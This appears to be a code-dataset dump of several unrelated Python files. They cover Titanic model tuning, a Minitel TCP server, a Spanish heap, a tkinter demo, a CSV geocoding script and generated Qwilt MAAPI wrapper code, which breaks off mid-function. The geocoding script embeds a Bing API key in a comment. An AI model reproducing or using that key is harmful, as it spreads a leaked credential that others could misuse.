X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:]   # the final testing data
X_train = X_data_full[20:,:]   # the training data
y_test = y_data_full[0:20]     # the final testing outputs/labels (unknown)
y_train = y_data_full[20:]     # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
    """Search for the best DecisionTree max_depth in [1, 20).

    For each candidate depth, runs 10 rounds of cross-validation
    (90% train / 10% test splits of the training data) and averages the
    test scores.  Returns (best average test score, best max_depth).

    Fixes vs. the original: the docstring described n_neighbors/k from a
    KNN experiment; a no-op `dtree.feature_importances_` statement was
    removed; resultList now records the *current* depth instead of the
    running best; best_depth is initialised so it can never be unbound.
    """
    resultList = []
    BestScore = 0
    best_depth = 1  # fallback so the return value is always defined
    # iterate through different max_depths from 1 to 19
    for max_depth in range(1, 20):
        dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
        training_score = []
        testing_score = []
        # run 10 different cross-validation splits
        for index in range(10):
            cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
                cross_validation.train_test_split(X_train, y_train, test_size=0.1)
            # fit the model on the cross-validation training split
            dtree = dtree.fit(cv_data_train, cv_target_train)
            training_score += [dtree.score(cv_data_train, cv_target_train)]
            testing_score += [dtree.score(cv_data_test, cv_target_test)]
        # average over the 10 rounds for this depth
        training_avgScore = 1.0 * sum(training_score) / len(training_score)
        testing_avgScore = 1.0 * sum(testing_score) / len(testing_score)
        # remember the best-performing depth
        if testing_avgScore > BestScore:
            BestScore = testing_avgScore
            best_depth = max_depth
        resultList += [[max_depth, training_avgScore, testing_avgScore]]
    print ('The best average score and the corresponding max_depth is: ')
    return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decision tree?
By running findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008, 3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
    """Fit a DecisionTree of the given depth on the *full* data set and
    export it as a Graphviz file named tree<max_depth>.dot.

    Fix: the final print claimed 'tree.dot' regardless of the file that
    was actually written; it now reports the constructed filename.
    """
    dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
    # this next line is where the full training data is used for the model
    dtree = dtree.fit(X_data_full, y_data_full)
    print("\nCreated and trained a decision tree classifier")
    # write out the dtree to tree<max_depth>.dot
    filename = 'tree' + str(max_depth) + '.dot'   # constructed filename!
    tree.export_graphviz(dtree, out_file=filename,
                         feature_names=feature_names, filled=True, rotate=False,  # LR vs UD
                         class_names=target_names, leaves_parallel=True)
    print ('write out ' + filename)
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
    """Search for the best RandomForest max_depth in [1, 20).

    For each candidate depth (n_estimators fixed at 100), runs 10 rounds
    of cross-validation and averages the test scores.  Returns
    (best average test score, best max_depth).

    Fixes vs. the original: resultList now records the *current* depth
    instead of the running best; best_depth is initialised so it can
    never be unbound.
    """
    resultList = []
    BestScore = 0
    best_depth = 1  # fallback so the return value is always defined
    # iterate through different max_depths from 1 to 19
    for max_depth in range(1, 20):
        rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
        training_score = []
        testing_score = []
        # run 10 different cross-validation splits
        for index in range(10):
            cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
                cross_validation.train_test_split(X_train, y_train, test_size=0.1)
            # fit the model on the cross-validation training split
            rforest = rforest.fit(cv_data_train, cv_target_train)
            training_score += [rforest.score(cv_data_train, cv_target_train)]
            testing_score += [rforest.score(cv_data_test, cv_target_test)]
        # average over the 10 rounds for this depth
        training_avgScore = 1.0 * sum(training_score) / len(training_score)
        testing_avgScore = 1.0 * sum(testing_score) / len(testing_score)
        # remember the best-performing depth
        if testing_avgScore > BestScore:
            BestScore = testing_avgScore
            best_depth = max_depth
        resultList += [[max_depth, training_avgScore, testing_avgScore]]
    print ('The best average score and the corresponding max_depth is: ')
    return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
    """Search for the best RandomForest n_estimators among the multiples
    of 10 below 200, with max_depth fixed at 5 (the docstring used to say
    16, contradicting the code).  Returns (best average test score,
    best n_estimators).
    """
    resultList = []
    BestScore = 0
    best_n = 10  # fallback so the return value is always defined
    nList = [ n for n in range(1,200) if n%10 == 0]
    for n in nList:
        rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
        training_score = []
        testing_score = []
        # run 10 different cross-validation splits
        for index in range(10):
            cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
                cross_validation.train_test_split(X_train, y_train, test_size=0.1)
            # fit the model on the cross-validation training split
            rforest = rforest.fit(cv_data_train, cv_target_train)
            training_score += [rforest.score(cv_data_train, cv_target_train)]
            testing_score += [rforest.score(cv_data_test, cv_target_test)]
        # average over the 10 rounds for this estimator count
        training_avgScore = 1.0 * sum(training_score) / len(training_score)
        testing_avgScore = 1.0 * sum(testing_score) / len(testing_score)
        # remember the best-performing n
        if testing_avgScore > BestScore:
            BestScore = testing_avgScore
            best_n = n
        resultList += [[n, training_avgScore, testing_avgScore]]
    print ('The best average score and the corresponding n_estimator is: ')
    return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)  # tuned values from above
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
    cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# NOTE(review): the split above is computed but unused — the fit below
# trains on the full training set; confirm whether that was intended.
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decision tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085  0.532224    0.14179381  0.0545039   0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
# Impute the missing ages with a random-forest regressor (same tuned
# hyper-parameters as the classifier above), trained on the complete rows.
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: impute the same column with K-nearest-neighbours instead
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
|
15,176 | 9318a2d090d26afab3aef101b2915b62e18fe7a1 | '''
Created on 18 Oct 2019
@author: mdonze
'''
import logging
import os
import yaml
import logging.config
from minitel_server import constant
from minitel_server.tcp_server import TCPServer
from minitel_server.configuration import Configuration
logger = logging.getLogger('main')
def setup_logging(default_path='logging.yaml', default_level=logging.INFO, env_key='LOG_CFG'):
    """
    | **@author:** Prathyush SP
    | Logging Setup
    """
    # the environment variable (if set and non-empty) overrides the default path
    path = os.getenv(env_key, None) or default_path
    if not os.path.exists(path):
        # no config file at all: fall back to basic logging
        logging.basicConfig(level=default_level)
        # coloredlogs.install(level=default_level)
        print('Failed to load configuration file. Using default configs')
        return
    with open(path, 'rt') as f:
        try:
            config = yaml.safe_load(f.read())
            logging.config.dictConfig(config)
            # coloredlogs.install()
        except Exception as e:
            # malformed YAML / bad dictConfig: report and fall back
            print(e)
            print('Error in Logging Configuration. Using default configs')
            logging.basicConfig(level=default_level)
def main():
    """Entry point: configure logging, load configuration, start one TCP
    server per numerically-named page directory, then wait on all of them.

    Fix: the bare ``except:`` around int() also swallowed SystemExit and
    KeyboardInterrupt; it now catches only ValueError.
    """
    setup_logging()
    Configuration.load_configuration()
    # Each sub-directory of the page folder whose name parses as an
    # integer is treated as a service listening on that port.
    ports = []
    for dirName in next(os.walk(Configuration.page_folder))[1]:
        logger.info("Searching service in " + dirName)
        try:
            ports.append(int(dirName))
        except ValueError:
            # non-numeric directory names are simply not services
            pass
    servers = []
    for p in ports:
        srv = TCPServer(p)
        srv.start()
        servers.append(srv)
    # block until every server terminates
    for s in servers:
        s.join()
if __name__ == '__main__':
main()
|
15,177 | 48396c4c61583d896880aa9e263c08f19b208f21 | import random
class Heap():
    """Min-heap backed by a fixed-capacity pre-allocated list.

    ``tamanio`` counts the occupied slots; ``vector`` holds the storage.
    """

    def __init__(self, tamanio):
        # the heap starts empty; capacity is fixed at construction time
        self.tamanio = 0
        self.vector = [None] * tamanio
def agregar(heap, dato):
    """Append ``dato`` at the end of the heap and float it into place."""
    posicion = heap.tamanio
    heap.vector[posicion] = dato
    flotar(heap, posicion)
    heap.tamanio = posicion + 1
def quitar(heap):
    """Remove and return the root element, then re-heapify."""
    raiz = heap.vector[0]
    ultimo = heap.tamanio - 1
    # move the last element to the root, shrink, and sink it down
    heap.vector[0], heap.vector[ultimo] = heap.vector[ultimo], heap.vector[0]
    heap.tamanio = ultimo
    hundir(heap, 0)
    return raiz
def flotar(heap, indice):
    """Float the element at ``indice`` up until its parent is not larger
    (min-heap property)."""
    while indice > 0:
        padre = (indice - 1) // 2
        if heap.vector[padre] <= heap.vector[indice]:
            break
        heap.vector[padre], heap.vector[indice] = heap.vector[indice], heap.vector[padre]
        indice = padre
def hundir(heap, indice):
    """Sink the element at ``indice`` down until the min-heap property holds.

    Fixes three defects in the original:
    * the loop bound was ``hi < heap.tamanio - 1``, so a node whose only
      child was the last element was never compared against it;
    * the comparison was inverted (it swapped when the parent was
      *smaller* than the child), contradicting the min-heap order that
      flotar() establishes;
    * ``indice`` was never advanced after a swap, so later iterations
      compared against a stale position.
    """
    # hi = left-child index
    hi = (2 * indice) + 1
    control = True
    while (hi < heap.tamanio) and control:
        # pick the smaller of the two children
        menor = hi
        # hd = right-child index
        hd = hi + 1
        if (hd <= heap.tamanio - 1) and (heap.vector[hd] < heap.vector[hi]):
            menor = hd
        # swap down while the parent is larger than its smaller child
        if heap.vector[menor] < heap.vector[indice]:
            heap.vector[indice], heap.vector[menor] = heap.vector[menor], heap.vector[indice]
            indice = menor  # keep following the element we are sinking
        else:
            control = False
        hi = (2 * menor) + 1
def atencion_H(heap):
    """Serve the priority queue: remove and return the front element."""
    return quitar(heap)

def arribo_H(heap, dato, prioridad=0):
    """Enqueue ``dato`` with an optional priority into the heap queue."""
    agregar(heap, [dato, prioridad])
"""
def ordenarHeap(heap):
'''Ordena el heap'''
for i in range(heap.tamanio):
flotar(heap, i)
"""
"""
def heapSort(heap):
'''Metodo de ordenamiento monticulo'''
aux = heap.tamanio
for i in range(0, heap.tamanio-1):
quitar(heap)
heap.tamanio = aux
"""
def monticulizar(lista):
    """Turn a plain list into a min-heap, in place.

    Fix: the original called ``flotar(lista, i)``, but flotar dereferences
    ``.vector``/``.tamanio`` attributes that a plain list does not have,
    so the call raised AttributeError.  The float-up is now done directly
    on the list.
    """
    for i in range(len(lista)):
        hijo = i
        padre = (hijo - 1) // 2
        # float element i up until its parent is not larger
        while padre >= 0 and lista[padre] > lista[hijo]:
            lista[padre], lista[hijo] = lista[hijo], lista[padre]
            hijo = padre
            padre = (hijo - 1) // 2
def heap_vacio(heap):
    """Return True when the heap holds no elements."""
    return heap.tamanio == 0
def buscar_H(heap, dato):
    """Return the index of ``dato`` inside the heap, or None if absent.

    Fix: the original evaluated ``dato in heap`` and ``heap.index(dato)``
    on the Heap instance, which is neither iterable nor a list, raising
    TypeError/AttributeError.  The search now scans the occupied portion
    of the backing vector.
    """
    ocupados = heap.vector[:heap.tamanio]
    if dato in ocupados:
        return ocupados.index(dato)
    else:
        return None
def barridoMonticulo(heap):
    """Print every stored element, one per line, in array (level) order."""
    for posicion in range(heap.tamanio):
        print(heap.vector[posicion])
# Demo: enqueue sample values (priority defaults to 0) and dump the
# heap's internal array order.
lala = [2, 45, 1, 15, 18, 99, 0, 233, 57]
mont = Heap(100)
for i in range(len(lala)):
    arribo_H(mont, lala[i])
barridoMonticulo(mont)
|
15,178 | dfb0a54c21b002d0b1d027cf6ae4b40f740e94c3 | from tkinter import *
from tkinter.ttk import *
# Minimal ttk.Treeview demo: the built-in tree column (#0) plus two data
# columns "A" and "B".
root = Tk()
tree = Treeview(root, selectmode="extended", columns=("A", "B"))
tree.pack(expand=YES, fill=BOTH)
tree.heading("#0", text="C/C++ compiler")
tree.column("#0", minwidth=80, width=100, stretch=NO)   # fixed-width tree column
tree.heading("A", text="A")
tree.column("A", minwidth=0, width=200, stretch=NO)     # fixed-width data column
tree.heading("B", text="B")
tree.column("B", minwidth=0, width=300)  # only "B" may absorb extra width (stretch not disabled)
root.mainloop()
15,179 | ff1909126fcef5aa6479e0b4bd3f43c5b103d4fd | class UserType:
id = 0
description = ""
def __int__(self):
pass
def __init__(self, id, description):
self.id = id
self.description = description |
15,180 | f49260a7ebd6bc275401fbd5f85451f60a0166ef | import csv
import geocoder
# Geocode free-text locations (column 13) into lat/lng (columns 51/52),
# copying the enriched rows to the output file.  Python 2 script.
# NOTE(review): neither file handle is ever closed, and the output is
# opened in append mode — presumably so the job is restartable; confirm.
f1 = open('../dataset/geocoded_locations_blanks.csv', 'r')
f2 = open('../dataset/geocoded_locations_blanks_coded1.csv', 'a')
csvreader = csv.reader(f1, delimiter=",", quotechar='"')
csvwriter = csv.writer(f2, delimiter=",", quotechar='"', quoting = csv.QUOTE_MINIMAL)
for i, row in enumerate(csvreader):
    print i  # progress indicator
    # only rows with a non-empty location string are geocoded
    if i >= 0 and len(row[13]) !=0 :
        geo_obj = geocoder.google(row[13], method="places")
        # HACK: alternate provider with an embedded key — credentials
        # should not live in source control, even commented out.
        #geo_obj = geocoder.bing(row[13],key="An6DQft9XyD2rpIculUpNoJRMF4ovoya4ARm_BLVR6mJFU62riZXceoL_Lpyi" )
        latlng = geo_obj.latlng
        print latlng
        # NOTE(review): latlng may be None on lookup failure, which would
        # make len(latlng) raise TypeError — confirm against the library.
        if len(latlng) != 0:
            row[51]=latlng[0]
            row[52]=latlng[1]
        else:
            # no result: write sentinel zeros
            row[51]=0
            row[52]=0
        csvwriter.writerow(row)
15,181 | 7ed966af4b81c43fa6980a449a421d947ebad60b |
# Copyright Qwilt, 2012
#
# The code contained in this file may not be used by any other entities without explicit written permission from Qwilt.
#
# Author: naamas
from a.infra.misc.enum_with_value import EnumWithValue
from a.infra.basic.return_codes import ReturnCodes
from a.infra.misc.init_guard import InitGuard
from a.sys.confd.pyconfdlib.tag_values import TagValues
from a.sys.confd.pyconfdlib.value import Value
from a.sys.confd.pyconfdlib.key_path import KeyPath
from system_defaults_maapi_base_gen import SystemDefaultsMaapiBase
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.content.content_maapi_gen import BlinkyContentMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.connectivity_check.connectivity_check_maapi_gen import BlinkyConnectivityCheckMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.management.management_maapi_gen import BlinkyManagementMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.link.link_maapi_gen import BlinkyLinkMaapi
from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.device.device_maapi_gen import BlinkyDeviceMaapi
class BlinkySystemDefaultsMaapi(SystemDefaultsMaapiBase):
    """Generated MAAPI wrapper for the interface system-defaults subtree.

    Holds one lazily-created child wrapper per sub-container (content,
    connectivity-check, management, link, device) and a
    Requested / value / Set triplet of attributes per scalar leaf.
    """

    def __init__ (self, logger):
        self.myInitGuard = InitGuard()
        self._log=logger.createLogger("sys-blinky-oper-example","blinky-maapi-systemDefaults")
        self.domain = None
        # child sub-container wrappers, created on demand by the new*() factories
        self.contentObj = None
        self.connectivityCheckObj = None
        self.managementObj = None
        self.linkObj = None
        self.deviceObj = None
        # per-leaf state: <name>Requested (fetch on next read/write),
        # <name> (cached value), <name>Set (whether the cached value is valid)
        self.configurationDelayRequested = False
        self.configurationDelay = None
        self.configurationDelaySet = False
        self.muteReportingRequested = False
        self.muteReporting = None
        self.muteReportingSet = False
        self.sendGratuitousArpRequested = False
        self.sendGratuitousArp = None
        self.sendGratuitousArpSet = False
        self.shutdownRequested = False
        self.shutdown = None
        self.shutdownSet = False
        self.techModeRequested = False
        self.techMode = None
        self.techModeSet = False

    def init (self, domain):
        """Bind this wrapper to a MAAPI domain; must be called exactly once."""
        self.myInitGuard.crashIfInitDone()
        for logFunc in self._log('init').debug3Func(): logFunc('called. domain=%s', domain)
        self.domain = domain
        self.myInitGuard.initDone()
    def requestConfigAndOper (self):
        """Mark every leaf and child subtree to be fetched (config and oper)."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-config-and-oper').debug3Func(): logFunc('called, PARAMS')
        # request all scalar leaves
        self.requestConfigurationDelay(True)
        self.requestMuteReporting(True)
        self.requestSendGratuitousArp(True)
        self.requestShutdown(True)
        self.requestTechMode(True)
        # create each child on demand, then propagate the request
        if not self.contentObj:
            self.contentObj = self.newContent()
        self.contentObj.requestConfigAndOper()
        if not self.connectivityCheckObj:
            self.connectivityCheckObj = self.newConnectivityCheck()
        self.connectivityCheckObj.requestConfigAndOper()
        if not self.managementObj:
            self.managementObj = self.newManagement()
        self.managementObj.requestConfigAndOper()
        if not self.linkObj:
            self.linkObj = self.newLink()
        self.linkObj.requestConfigAndOper()
        if not self.deviceObj:
            self.deviceObj = self.newDevice()
        self.deviceObj.requestConfigAndOper()

    def requestConfig (self):
        """Mark every leaf and child subtree to be fetched (config only)."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-config').debug3Func(): logFunc('called, PARAMS')
        self.requestConfigurationDelay(True)
        self.requestMuteReporting(True)
        self.requestSendGratuitousArp(True)
        self.requestShutdown(True)
        self.requestTechMode(True)
        if not self.contentObj:
            self.contentObj = self.newContent()
        self.contentObj.requestConfig()
        if not self.connectivityCheckObj:
            self.connectivityCheckObj = self.newConnectivityCheck()
        self.connectivityCheckObj.requestConfig()
        if not self.managementObj:
            self.managementObj = self.newManagement()
        self.managementObj.requestConfig()
        if not self.linkObj:
            self.linkObj = self.newLink()
        self.linkObj.requestConfig()
        if not self.deviceObj:
            self.deviceObj = self.newDevice()
        self.deviceObj.requestConfig()

    def requestOper (self):
        """Mark operational data for fetching.

        NOTE(review): the local leaves are requested with False here
        (generated behaviour) — they appear to be config-only; confirm
        against the YANG model.
        """
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-oper').debug3Func(): logFunc('called, PARAMS')
        self.requestConfigurationDelay(False)
        self.requestMuteReporting(False)
        self.requestSendGratuitousArp(False)
        self.requestShutdown(False)
        self.requestTechMode(False)
        if not self.contentObj:
            self.contentObj = self.newContent()
        self.contentObj.requestOper()
        if not self.connectivityCheckObj:
            self.connectivityCheckObj = self.newConnectivityCheck()
        self.connectivityCheckObj.requestOper()
        if not self.managementObj:
            self.managementObj = self.newManagement()
        self.managementObj.requestOper()
        if not self.linkObj:
            self.linkObj = self.newLink()
        self.linkObj.requestOper()
        if not self.deviceObj:
            self.deviceObj = self.newDevice()
        self.deviceObj.requestOper()
    def clearAllRequested (self):
        """Drop every pending fetch request (local leaves and children)."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('clear-all-requested').debug3Func(): logFunc('called, PARAMS')
        self.requestConfigurationDelay(False)
        self.requestMuteReporting(False)
        self.requestSendGratuitousArp(False)
        self.requestShutdown(False)
        self.requestTechMode(False)
        # children are created if missing so the clear reaches every subtree
        if not self.contentObj:
            self.contentObj = self.newContent()
        self.contentObj.clearAllRequested()
        if not self.connectivityCheckObj:
            self.connectivityCheckObj = self.newConnectivityCheck()
        self.connectivityCheckObj.clearAllRequested()
        if not self.managementObj:
            self.managementObj = self.newManagement()
        self.managementObj.clearAllRequested()
        if not self.linkObj:
            self.linkObj = self.newLink()
        self.linkObj.clearAllRequested()
        if not self.deviceObj:
            self.deviceObj = self.newDevice()
        self.deviceObj.clearAllRequested()

    def clearAllSet (self):
        """Invalidate every value slated for writing (local leaves and children)."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('clear-all-set').debug3Func(): logFunc('called, PARAMS')
        self.setConfigurationDelay(None)
        self.configurationDelaySet = False
        self.setMuteReporting(None)
        self.muteReportingSet = False
        self.setSendGratuitousArp(None)
        self.sendGratuitousArpSet = False
        self.setShutdown(None)
        self.shutdownSet = False
        self.setTechMode(None)
        self.techModeSet = False
        # only existing children need clearing here
        if self.contentObj:
            self.contentObj.clearAllSet()
        if self.connectivityCheckObj:
            self.connectivityCheckObj.clearAllSet()
        if self.managementObj:
            self.managementObj.clearAllSet()
        if self.linkObj:
            self.linkObj.clearAllSet()
        if self.deviceObj:
            self.deviceObj.clearAllSet()
    def write (self
               , interface
               , trxContext=None
               ):
        """Write all set values under the given interface key via MAAPI."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('write').debug3Func(): logFunc('called, PARAMS')
        return self._internalWrite(interface, trxContext)

    def read (self
              , interface
              , trxContext=None):
        """Read the requested values under the given interface key.

        The second argument to _internalRead (defined outside this chunk)
        distinguishes the two read flavours; False here, True in
        readAllOrFail — presumably "fail when something is missing".
        """
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('read').debug3Func(): logFunc('called, PARAMS')
        return self._internalRead(interface,
                                  False,
                                  trxContext)

    def readAllOrFail (self
                       , interface
                       , trxContext=None):
        """Strict variant of read() — see the note on read()."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('read-all-or-fail').debug3Func(): logFunc('called, PARAMS')
        return self._internalRead(interface,
                                  True,
                                  trxContext)
    # --- child wrapper accessors: one new/set/get/has quartet per sub-container ---

    def newContent (self):
        """Create (but do not attach) a content child bound to our domain."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('new-content').debug3Func(): logFunc('called.')
        content = BlinkyContentMaapi(self._log)
        content.init(self.domain)
        return content

    def setContentObj (self, obj):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-content').debug3Func(): logFunc('called. obj=%s', obj)
        self.contentObj = obj

    def getContentObj (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-content').debug3Func(): logFunc('called. self.contentObj=%s', self.contentObj)
        return self.contentObj

    def hasContent (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-content').debug3Func(): logFunc('called. self.contentObj=%s', self.contentObj)
        if self.contentObj:
            return True
        return False

    def newConnectivityCheck (self):
        """Create (but do not attach) a connectivity-check child bound to our domain."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('new-connectivitycheck').debug3Func(): logFunc('called.')
        connectivityCheck = BlinkyConnectivityCheckMaapi(self._log)
        connectivityCheck.init(self.domain)
        return connectivityCheck

    def setConnectivityCheckObj (self, obj):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-connectivitycheck').debug3Func(): logFunc('called. obj=%s', obj)
        self.connectivityCheckObj = obj

    def getConnectivityCheckObj (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-connectivitycheck').debug3Func(): logFunc('called. self.connectivityCheckObj=%s', self.connectivityCheckObj)
        return self.connectivityCheckObj

    def hasConnectivityCheck (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-connectivitycheck').debug3Func(): logFunc('called. self.connectivityCheckObj=%s', self.connectivityCheckObj)
        if self.connectivityCheckObj:
            return True
        return False

    def newManagement (self):
        """Create (but do not attach) a management child bound to our domain."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('new-management').debug3Func(): logFunc('called.')
        management = BlinkyManagementMaapi(self._log)
        management.init(self.domain)
        return management

    def setManagementObj (self, obj):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-management').debug3Func(): logFunc('called. obj=%s', obj)
        self.managementObj = obj

    def getManagementObj (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-management').debug3Func(): logFunc('called. self.managementObj=%s', self.managementObj)
        return self.managementObj

    def hasManagement (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-management').debug3Func(): logFunc('called. self.managementObj=%s', self.managementObj)
        if self.managementObj:
            return True
        return False

    def newLink (self):
        """Create (but do not attach) a link child bound to our domain."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('new-link').debug3Func(): logFunc('called.')
        link = BlinkyLinkMaapi(self._log)
        link.init(self.domain)
        return link

    def setLinkObj (self, obj):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-link').debug3Func(): logFunc('called. obj=%s', obj)
        self.linkObj = obj

    def getLinkObj (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-link').debug3Func(): logFunc('called. self.linkObj=%s', self.linkObj)
        return self.linkObj

    def hasLink (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-link').debug3Func(): logFunc('called. self.linkObj=%s', self.linkObj)
        if self.linkObj:
            return True
        return False

    def newDevice (self):
        """Create (but do not attach) a device child bound to our domain."""
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('new-device').debug3Func(): logFunc('called.')
        device = BlinkyDeviceMaapi(self._log)
        device.init(self.domain)
        return device

    def setDeviceObj (self, obj):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-device').debug3Func(): logFunc('called. obj=%s', obj)
        self.deviceObj = obj

    def getDeviceObj (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-device').debug3Func(): logFunc('called. self.deviceObj=%s', self.deviceObj)
        return self.deviceObj

    def hasDevice (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-device').debug3Func(): logFunc('called. self.deviceObj=%s', self.deviceObj)
        if self.deviceObj:
            return True
        return False
    # --- scalar leaf accessors: a request/is/get/has/set quintet per leaf.
    # request*() schedules (or cancels) the fetch and invalidates the cache;
    # get*() returns the cached value only while the Set flag is up.

    def requestConfigurationDelay (self, requested):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-configurationdelay').debug3Func(): logFunc('called. requested=%s', requested)
        self.configurationDelayRequested = requested
        self.configurationDelaySet = False

    def isConfigurationDelayRequested (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('is-configurationdelay-requested').debug3Func(): logFunc('called. requested=%s', self.configurationDelayRequested)
        return self.configurationDelayRequested

    def getConfigurationDelay (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-configurationdelay').debug3Func(): logFunc('called. self.configurationDelaySet=%s, self.configurationDelay=%s', self.configurationDelaySet, self.configurationDelay)
        if self.configurationDelaySet:
            return self.configurationDelay
        return None

    def hasConfigurationDelay (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-configurationdelay').debug3Func(): logFunc('called. self.configurationDelaySet=%s, self.configurationDelay=%s', self.configurationDelaySet, self.configurationDelay)
        if self.configurationDelaySet:
            return True
        return False

    def setConfigurationDelay (self, configurationDelay):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-configurationdelay').debug3Func(): logFunc('called. configurationDelay=%s, old=%s', configurationDelay, self.configurationDelay)
        self.configurationDelaySet = True
        self.configurationDelay = configurationDelay

    def requestMuteReporting (self, requested):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-mutereporting').debug3Func(): logFunc('called. requested=%s', requested)
        self.muteReportingRequested = requested
        self.muteReportingSet = False

    def isMuteReportingRequested (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('is-mutereporting-requested').debug3Func(): logFunc('called. requested=%s', self.muteReportingRequested)
        return self.muteReportingRequested

    def getMuteReporting (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-mutereporting').debug3Func(): logFunc('called. self.muteReportingSet=%s, self.muteReporting=%s', self.muteReportingSet, self.muteReporting)
        if self.muteReportingSet:
            return self.muteReporting
        return None

    def hasMuteReporting (self):
        self.myInitGuard.isInitOrCrash()
